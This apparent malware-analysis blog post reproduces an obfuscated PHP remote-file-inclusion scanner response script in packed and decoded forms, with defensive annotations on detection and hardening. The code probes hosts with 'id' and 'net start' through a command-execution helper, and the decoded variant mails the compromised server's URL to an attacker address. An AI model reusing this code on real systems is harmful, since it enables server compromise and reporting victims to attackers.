PitBull CreW StableScanner

Found these heckers today when looking for online users in one board
The files are encrypted, but they are not hard to decrypt.
here u go

t:

<html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
// Analyst note (defensive annotation; the sample's code below is unchanged).
// Capability probe: runs `id` and `net start` through ex() and looks for "uid" or
// "Windows" in the output, i.e. it tests whether this PHP process can execute OS
// commands on a Unix-like or Windows host.
// The verdict is sent back as a fixed marker ("SafemodeOFF" / "SafemodeON"), so those
// strings, the "/// Response CMD ///" title and the <H1> banner above are usable
// detection strings for HTTP response bodies and for files found on disk.
// eregi() was removed in PHP 7.0, so this check as written depends on a PHP 5-era runtime.
// Hardening: the commenter on this page identifies the file as an RFI scanner response;
// if that is right, keeping allow_url_include off stops it from being pulled in at all,
// and disable_functions should cover every function ex() tries.
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
// First attempt produced no match: reset safe_mode and open_basedir to their
// configured values with ini_restore() and run the same probe once more.
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
// Neither attempt returned recognisable command output.
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
/**
 * Analyst note: command-execution helper called by the probe above.
 *
 * Passes $cfe to the first mechanism that is present, checked in this order:
 * exec, shell_exec, system, passthru, popen. Only one branch runs: the chain
 * selects on function_exists(), not on whether the call produced output.
 * Every call is prefixed with @, so failures raise no visible PHP warnings.
 *
 * Defensive reading: this list is what a disable_functions policy has to cover.
 * popen is the last fallback, so a policy that names only the first four still
 * leaves a path open.
 *
 * @param mixed $cfe Command line to run; an empty value skips execution.
 * @return mixed Captured output, or '' when $cfe is empty or no branch matched.
 */
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
// Output lines are joined with the literal letter "n" as written here;
// presumably a backslash was lost from "\n" when the sample was pasted.
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
// system() and passthru() print directly, so output buffering is used
// to capture what they write instead of sending it to the client.
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
// Read the child's stdout in 1024-byte chunks until end of stream.
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
// Analyst note: ends the script here; nothing after this point is executed.
exit;

r encrypted:

<?php
// Analyst note (defensive annotation; the packed line below is unchanged).
// Packer layout: $_F holds this file's path, $_X holds the encoded payload, and the
// base64 string handed to eval() is a fixed loader stub. Decoded, that stub
// base64-decodes $_X, applies a strtr() swap between the character sets
// '123456aouie' and 'aouie123456', replaces __FILE__ with the quoted path via
// ereg_replace(), evals the result, then overwrites $_R and $_X with 0.
// This is encoding, not encryption: no key is involved, so the payload can be
// recovered offline by applying the same two transforms and printing the result
// rather than evaluating it. Never execute the sample to unpack it.
// Detection: the literal prefix "$_F=__FILE__;$_X=" followed by eval(base64_decode(
// is a stable static signature for this packer.
// NOTE(review): the $_X literal on this page is not base64 data; the original blob
// appears to have been stripped from this copy, so this line cannot be unpacked as shown.
$_F=__FILE__;$_X='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';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

r decrypted:

?>?><html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
// Analyst note (defensive annotation; the sample's code below is unchanged).
// Same capability probe as the "t" sample: `id` / `net start` are run through ex()
// and the output is matched against "uid" / "Windows". The marker strings differ
// here ("SafeOFF" / "SafeON"), so response-body signatures need both variants.
// eregi() was removed in PHP 7.0, so this check as written depends on a PHP 5-era runtime.
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafeOFF");
}
else{
// No match on the first attempt: restore safe_mode and open_basedir to their
// configured values and probe once more.
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafeON");
}
}
// Analyst note: call-home step that is absent from the "t" sample. It runs
// unconditionally (outside the if/else above) and mails the URL of the current
// request, built from SERVER_NAME and REQUEST_URI, to a hard-coded recipient.
// The sender, recipient and subject below are indicators to search for in outbound
// mail logs of web hosts; a web server that has no reason to send mail should have
// mail() disabled or its outbound SMTP restricted.
// The repeated "//039u4i..." trailers carry no code and look like filler from the
// packer or author; the variable names appear to be Dutch phrases (unconfirmed).
//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$fromage =  "PitBull CreW <pitbullguys@onlinemail.com>";//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$jaenwiemoethemdanontvangenhe = "enable.insting@hotmail.com";//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$enwelkonderwerpmoethethebben = "StableScanner";//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$ennatuurlijkmoetenwedeurlnietvergeten = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
$hewehebbenooknoginfo = "From: ".$fromage;//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
mail($jaenwiemoethemdanontvangenhe, $enwelkonderwerpmoethethebben, $ennatuurlijkmoetenwedeurlnietvergeten, $hewehebbenooknoginfo);//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
//039u4i091u0jf9eja09ef830910745r308eyqfu3j1089rj10
/**
 * Analyst note: command-execution helper called by the probe above; the body is
 * the same as in the "t" sample.
 *
 * Passes $cfe to the first mechanism that is present, checked in this order:
 * exec, shell_exec, system, passthru, popen. Only one branch runs: the chain
 * selects on function_exists(), not on whether the call produced output.
 * Every call is prefixed with @, so failures raise no visible PHP warnings.
 *
 * Defensive reading: this list is what a disable_functions policy has to cover,
 * including popen, which is the last fallback.
 *
 * @param mixed $cfe Command line to run; an empty value skips execution.
 * @return mixed Captured output, or '' when $cfe is empty or no branch matched.
 */
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
// Output lines are joined with the literal letter "n" as written here;
// presumably a backslash was lost from "\n" at some point.
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
// system() and passthru() print directly, so output buffering is used
// to capture what they write instead of sending it to the client.
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
// Read the child's stdout in 1024-byte chunks until end of stream.
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
// Analyst note: ends the script here. In the packed form this code runs inside
// eval(), where exit still terminates the whole request.
exit;

Interesting links if you want to learn more about decoding $_F=__FILE__;$_X= encoded PHP files:
alexjudd
tareeinternet

for samples here:hxxp://mediapluss.info/wp-includes/images/crystal/


1 Comment

Anonymous - November 15, 2012 at 3:17 am

That looks like the old PitBull RFI scanner that's been obfuscated. Is there any new functionality included?
